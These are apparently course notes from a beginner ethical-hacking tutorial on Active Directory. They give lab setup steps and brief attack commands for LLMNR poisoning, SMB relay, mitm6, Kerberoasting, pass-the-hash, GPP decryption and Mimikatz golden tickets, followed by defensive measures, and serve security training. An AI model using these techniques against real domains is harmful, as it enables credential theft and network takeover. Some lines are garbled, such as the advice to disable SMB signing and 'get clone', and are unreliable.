Active Directory Hacking for Beginners

Jul 14, 2024

Active Directory Hacking for Beginners

Introduction

  • Instructor: Heath Adams
  • Course: Addition to Practical Ethical Hacking (25-hour course)
  • Current Course Coverage: Older material available for free, part of All Access Plan, up-to-date course on website
  • Material Includes:
    • Practical Ethical Hacking
    • Python, Rust coding
    • Malware analysis
    • Mobile pen testing
    • IoT hacking
    • Detection engineering
    • Windows forensics
  • Certifications: PJPT (Junior), PNPT (Advanced)
  • Live Training: September 16, 2023, PMPT available every month or two
  • Subscription: Consider subscribing to the YouTube channel for more content

Setting Up Virtual Machines (VMs)

  • Types of VMs: Windows 10 instance, Linux instance
  • Installation Tools:
    • Windows/Linux: VMware Workstation Player
    • Mac: Oracle VirtualBox

Steps for VM Setup

  1. VMware Installation
    • Download VMware Workstation Player
    • Install using the wizard
  2. Oracle VirtualBox Installation (For Mac)
    • Use Oracle VirtualBox for Mac
    • Download and install
  3. VM Creation
    • Allocate at least 4 GB RAM
    • Use NAT network settings
  4. Kali Linux Installation
    • Download Kali Linux VM image
    • Extract and open in VMware Workstation Player or Oracle VirtualBox
    • Change VM settings as needed
  5. Installing Pimp My Kali
    • Use sudo get clone to clone the repository
    • Run sudo ./pimpmykali.sh and follow prompts for new VM setup

Active Directory Lab Overview

  • Components:
    • Windows Server 2019 (Domain Controller)
    • Windows 10 Enterprise Machines (2 instances)
  • Requirements: 16 GB RAM, 60 GB disk space
  • Alternative Setup: Azure Lab, guided setup (additional cost), No technical support

Active Directory Lab Setup

  1. Downloading ISOs
    • Windows Server 2019
    • Windows 10 Enterprise (Evaluation Center)
  2. Install Windows Server 2019
    • Create new VM settings
    • Remove floppy drive
    • Set NAT network
    • Install roles (Active Directory Domain Services)
    • Promote to domain controller, set domain (e.g., marvel.local)
  3. Install Windows 10 Enterprise Machines
    • Create two VMs
    • Set up for individual machines
    • Set appropriate RAM and network settings
    • Join machines to the domain (e.g., marvel.local)
  4. Domain Controller Configuration
    • Create and manage users (e.g., Frank Castle, Tony Stark, SQLService)
    • Set up file shares (e.g., HackMe share)
    • Set Group Policy (e.g., Disable Windows Defender)

Initial Attack Vectors

  1. Responder and LLMNR Poisoning

    • Captures NTLMv2 hashes
    • Run responder tool: responder -I <interface> -rdwV
    • Crack with Hashcat

  2. SMB Relay

    • Uses responder for capturing, ntlmrelayx for relaying
    • Target machines with SMB signing disabled
    • Use: ntlmrelayx.py -tf <targets file> --smb2support
    • Capture NTLMv2 hash and relay it
    • Potential for shell on another machine

  3. IPv6 Attacks (MITM6)

    • Spoof DNS for IPv6
    • Use man-in-the-middle 6: mitm6 -d <domain>
    • Collect data and relay
    • Use ntlmrelayx for LDAP relay to domain controller

Post-Compromise Enumeration

  1. Power View

    • Powershell-based AD enumeration tool
    • Load into session: powershell.exe -EP Bypass ./powerview.ps1
    • Commands: Get-NetDomain, Get-NetDomainController, Get-NetUser, etc.

  2. Bloodhound

    • Visualizes AD information to identify paths to domain admin
    • Install and setup: apt install bloodhound
    • Ingest data using SharpHound
    • Analyze queries and visualize data

Post-Compromise Attacks

  1. Pass-the-Hash and Pass-the-Password

    • Use compromised hashes or plaintext passwords
    • Execute with CrackMapExec

  2. Token Impersonation

    • Use Metasploit's incognito feature to impersonate tokens
    • list_tokens -u, impersonate_token <user>

  3. Kerberoasting

    • Exploit service principal names (SPN) to request TGS
    • Crack the ticket for plaintext passwords
    • Tools: getuserspns.py, Hashcat

  4. GPP/C-Password Attack

    • Exploit stored credentials in Group Policy Preferences
    • Locate credentials (cPassword), decrypt with gpp-decrypt <hash>

  5. Golden Ticket Attack

    • Generate Kerberos ticket-granting tickets using krbtgt hash
    • Persist access across domain
    • kerberos::golden, lsadump::lsa /inject for ntlm hash insight

Summary and Recommendations

  • Essential Tools:
    • Responder
    • Bloodhound
    • Power View
    • CrackMapExec
    • Metasploit (incognito)
    • Impacket toolkit (essentials like getuserspns.py, ntlmrelayx)
    • Mimikatz for LSA dump (cleartext credentials, pass-the-ticket)
  • Certifications:
    • PJPT: Penetration testing basics, includes training material
    • PNPT: Advanced, focused on active directory
  • Further Study and Practice:
    • Continue with HackTheBox, TryHackMe labs
    • Engage in CTF challenges for continued learning

Defensive Strategies

  • Disabling LLMNR and SMB Signing
  • Enabling Network Access Control (NAC)
  • Using Strong Password Policies
  • Account Tiering and Least Privilege Principle
  • Enabling SMB Signing
  • Deploying Privilege Access Management (PAM) Tools

Conclusion

  • Subscription Encouragement: Follow the channel for more content
  • Academy Access: Check out additional courses and materials available
  • Next Steps: Certifications can bolster your resume and career in penetration testing. Consider PNPT for advanced AD penetration skills.
  • Other Resources: Engage with community practices, shared resources in the cybersecurity community for continuous growth.